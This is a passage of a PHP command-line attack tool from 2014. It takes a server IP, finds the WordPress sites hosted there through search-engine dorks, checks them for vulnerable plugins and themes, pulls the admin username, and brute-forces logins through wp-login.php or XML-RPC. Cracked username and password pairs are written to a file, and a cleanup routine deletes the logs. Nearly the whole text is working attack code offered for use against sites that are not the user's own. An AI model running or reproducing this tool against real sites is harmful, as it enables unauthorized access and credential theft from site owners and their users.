d->results as $value) {
$file = fopen("sites.txt","a+");
fwrite($file,"{$value->DisplayUrl}\n");
fclose($file);
}
}
function wp($list){
########################################
## CHECK IF IS BUILT ON WORDPRESS ##
########################################
$file = file_get_contents($list);
$get = explode('\n', $file);
foreach($get as $site){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
$filename = 'wp-sites.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $site."\n");
fclose($fp);
}
}
$lines = file('wp-sites.txt');
$lines = array_unique($lines);
file_put_contents('wp-sites.txt', implode($lines));
}
function wp_em($list){
###############################
## MAKE'EM CRYSTAL CLEAR ##
###############################
$file = file_get_contents($list);
$get = explode("\n", $file);
foreach($get as $wpsite){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wpsite);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
preg_match('||', $result, $url);
$wpurl = str_replace("xmlrpc.php","",$url[1]);
$filename = 'wp.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $wpurl."\n");
fclose($fp);
}
$lines = file('wp.txt');
$lines = array_unique($lines);
file_put_contents('wp.txt', implode($lines));
}
function xp_scanner($target, $list, $key = NULL){
##########################################################
## PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION ##
##########################################################
## LIST FORMAT: NAME:PATH:KEYWORD ##
## EXAMPLE: xp:wp-content/plugins/xp/xp.php:Group-XP ##
##########################################################
## NAME IS REQUIRED (*) ##
## PATH IS REQUIRED (*) ##
## KEYWORD IS OPTIONAL (?) ##
##########################################################
$file = file_get_contents($list);
$plugins = explode("\n", $file);
#print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
if($key == NULL){
foreach($plugins as $plugin){
#####################
## GET HEADERS ##
#####################
$x = explode(":", $plugin);
$target = $target.'/'.$x[1];
$check = @get_headers($target);
if(eregi("200",$check[0])){
####################
## PLUGIN FOUND ##
####################
print "\n\t[!] FOUND $x[0] -> $target";
/*
#############
## SAVE IT ##
#############
$data = $target." -> ".$x[0]."\n";
$filename = 'vuln.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data);
fclose($fp);
*/
}#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
}
}else{
foreach($plugins as $plugin){
#####################
## GET KEYWORD ##
#####################
$x = explode(":", $plugin);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
if(preg_match("#".$x[2]."#", $result)){
####################
## PLUGIN FOUND ##
####################
print "\n\t[!] FOUND $x[0] -> $target";
/*
#############
## SAVE IT ##
#############
$data = $target." -> ".$x[0]."\n";
$filename = 'vuln.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data);
fclose($fp);
*/
} #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
}
}
}
function xp_get_plugins($target){
#########################
## GET ALL PLUGINS ##
#########################
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
$plugins = array_unique($plugin[1]);
#if(count($plugins)==0){
# print "No Plugin was found.";
#}
foreach($plugins as $found){
#print "\n\n$found\n\n";
#################
## SEARCH IT ##
#################
xp_scanner_db($target, $found);
}
}
function xp_get_themes($target){
#########################
## GET ALL PLUGINS ##
#########################
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
$themes = array_unique($theme[1]);
#if(count($plugins)==0){
# print "No Plugin was found.";
#}
foreach($themes as $found){
#print "\n\n$found\n\n";
#################
## SEARCH IT ##
#################
xp_scanner_db($target, $found);
}
}
function xp_scanner_db($target, $plugin){
#######################################################################
## PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION ##
#######################################################################
## THIS VERSION ONLY CHECKS ##
## - WORDPRESSEXPLOIT.COM ##
## - EXPLOIT-DB.COM ##
################################
$wpexploit = array("http://www.wordpressexploit.com/", );
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wpexploit);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
if(preg_match("#$plugin#", $result)){
##############
## GOTCHA ##
##############
//print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
###############
## SAVE IT ##
###############
$data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
$filename = 'vulpl.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
}
}
function xp_get_user($target,$list, $xmlrpc = NULL){
####################################
## GET WORDPRESS USERNAME ##
## A SIMPLE ONE BUT WOTH A SHOT ##
####################################
$user = trim(($target))."/?author=1";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $user);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$result = curl_exec($ch);
curl_exec($ch);
curl_close($ch);
preg_match('#
(.*?)#', $result, $username);
$account = explode('|', $username[1]);
if($xmlrpc == NULL){
###########################################################
## START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
###########################################################
return xp_brute($target,$account[0],$list);
}else {
###########################################################
## START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT ##
###########################################################
return xp_brute_xmlrpc($target,$account[0],$list);
}
}
function xp_brute($target,$user,$list){
###########################################
## BRUTE FORCE PULBLIC/FIRST VERSION ##
###########################################
## PASSWORDS LIST FORMAT: PASSWORD\n ##
## EXAMPLE: 12345\np4ssw0rd ##
## ( \n = NEW LINE ) ##
###########################################
$file = file_get_contents($list);
$passwords = explode("\n", $file);
$target = trim($target);
$user = trim($user);
print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
foreach($passwords as $password){
#############################
## TESTING EACH PASSWORD ##
#############################
$redirect = $taregt."/wp-admin/";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
$urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
$result = curl_exec($curl);
curl_close($curl);
##########################
## CHECK IF IT WORKED ##
##########################
if(strstr($result, 'tab-panel-overview')){
print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
###############
## SAVE IT ##
###############
$data = "\n[!] Cracked $target -> [ $user:$password ]";
$filename = 'cracked.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
break;
}#else{ print "\n[+] Trying $user:$password"; }
}
}
function xp_check_xmlrpc($target){
$target = $target."/xmlrpc.php";
$check = @get_headers($target);
if(eregi("200",$check[0])){
return 1;
}else{
return 0;
}
}
function xp_brute_xmlrpc($target,$user,$list){
######################################################
## BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION ##
######################################################
## PASSWORDS LIST FORMAT: PASSWORD\n ##
## EXAMPLE: 12345\np4ssw0rd ##
## ( \n = NEW LINE ) ##
######################################################
$target = trim($target);
$user = trim($user);
if(xp_check_xmlrpc($target) != 1){
print "\n[!] Couldn't find xmlrpc.php in $target\n";
break;
}else{
$file = file_get_contents($list);
$passwords = explode("\n", $file);
print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
foreach($passwords as $password){
$password = trim($password);
$headers = array('Content-Type: application/x-www-form-urlencoded');
$isadmin = 'isAdmin';
#############################
## TESTING EACH PASSWORD ##
#############################
$data = "
wp.getUsersBlogs
$user
$password
";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
$result = curl_exec($curl);
curl_close($curl);
##########################
## CHECK IF IT WORKED ##
##########################
if(strstr($result, $isadmin)){
print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
###############
## SAVE IT ##
###############
$data = "\n[!] Cracked $target -> [ $user:$password ]";
$filename = 'cracked.txt';
$fp = fopen($filename, "a+");
$write = fputs($fp, $data."\n");
fclose($fp);
break;
}#else{ print "\n[+] Trying $user:$password"; }
}
}
}
function bye(){
########################
## DONE/SAY GOODBYE ##
########################
print "\n\n[+] DONE!\n[-] EXITING.\n\n";
######################
## DELETE LOG FILES ##
###################################################################
## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
###################################################################
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
exit(2);
}
############################
## COMMAND LINE'S SHIT ##
############################
clear();
noblackhat();
################################################
## MAKE SURE IT RUNS ONLY FROM COMMAND LINE ##
################################################
if( strtolower(php_sapi_name()) != 'cli' ) {
printf("%s\n", "Please run only from command line interface.");
exit;
}
clear();
banner();
print "\nIP-Address # ";
$target = trim(fgets(STDIN));
// if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
##############################
## DELETE OLD LOG FILES ##
##############################
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
unlink('vulpl.txt');
#############################
## CREAT THE LOG FILES ##
#############################
$log1 = fopen("sites.txt","w");fclose($log1);
$log2 = fopen("wp-sites.txt","w");fclose($log2);
$log3 = fopen("wp.txt","w");fclose($log3);
$log4 = fopen("vuln.txt","w");fclose($log4);
$log4 = fopen("cracked.txt","w");fclose($log4);
$log5 = fopen("vulpl.txt","w");fclose($log5);
###############################
## SHIT IS GETTIN' REAL =P ##
###############################
print "\nDORK [or simply leave it empty] # ";
$dork = trim(fgets(STDIN));
print "\n[+] Getting the server's sites";
if($dork == ""){
#########################
## IF DORK WAS EMPTY ##
#########################
bing_it("ip:$target");
bing_it("ip:".$target." /page_id=");
bing_it("ip:".$target." Wordpress");
bing_it("ip:".$target." blog");
}else{
###########################
## USE THE USER'S DORK ##
###########################
bing_it("ip:".$target." ".$dork);
}
#print "\n[-] Got'em";sleep(1);
print "\n[+] Separating the sites";
wp('sites.txt');
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
wp_em('wp-sites.txt');
#################
## Results ##
#################
print "\n[+] Finished, these are the website/s that I found:\n";
$wplist = file_get_contents('wp.txt');
$get = explode("\n", $wplist);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($get as $hk){
if(!$hk==""){
print "\n\t[!] $hk";
}
}
###########################
## GIVE ME AN OPTION ##
###########################
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
$what = trim(fgets(STDIN));
$choice = array("1","2","3","4");
$yesno = array("y","yes");
if(in_array($what, $choice)){
if($what == "1"){
print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
$list = trim(fgets(STDIN));
if(!is_file($list)) {
#######################
## CAN'T LOAD LIST ##
#######################
print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
##############
## EXIT ##
##############
bye();
}
#################
## POOYAA! ##
#################
print "\n[+] Scanning begun";
$file = file_get_contents($list);
$plugins = explode("\n", $file);
print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
$targets = file_get_contents('wp.txt');
$r00t3rz = explode("\n", $targets);
print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
$key = strtolower(trim(fgets(STDIN)));
if(in_array($key, $yesno)){
$key = "set";
}else{
$key = NULL;
}
foreach($r00t3rz as $z){
if(!$z == ""){
xp_scanner($z, $list, $key);
}
}
/*
#################
## Results ##
#################
print "\n[+] Scanning finished!";
$vul = file_get_contents('vuln.txt');
$able = explode("\n", $vul);
print '[ '.count($able).' Website ]\n';
foreach($able as $gxp){
if(!$gxp==""){
print "\n\t[!] $gxp";
}
}
*/
bye();
} elseif($what == "2") {
print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
#################
## POOYAA! ##
#################
print "\n[+] Scanning begun";
$targets = file_get_contents('wp.txt');
$r00t3rz = explode("\n", $targets);
foreach($r00t3rz as $z){
if(!$z == ""){
xp_get_plugins($z);
xp_get_themes($z);
}
}
#################
## Results ##
#################
print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
$vulpl = file_get_contents('vulpl.txt');
$getpl = explode("\n", $vulpl);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($getpl as $vul){
if(!$vul==""){
print "\n\t$vul";
}
}
bye();
} elseif($what == "3") {
print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
$list = trim(fgets(STDIN));
if(!is_file($list)) {
#######################
## CAN'T LOAD LIST ##
#######################
print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
##############
## EXIT ##
##############
bye();
}
#################
## POOYAA! ##
#################
print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
$xmlrpc = strtolower(trim(fgets(STDIN)));
if(in_array($xmlrpc, $yesno)){
$xml = "set";
}else{
$xml = NULL;
}
print "\n[+] Bruting begun";
$targets = file_get_contents('wp.txt');
$xp = explode("\n", $targets);
foreach($xp as $z){
if(!$z == ""){
xp_get_user($z, $list, $xml);
}
}
bye();
} else {
######################
## OOH KILL'EM =P ##
######################
bye();
}
}
####################################
## © R00T3Rz.COM 2014 - CHEERS! ##
####################################
?>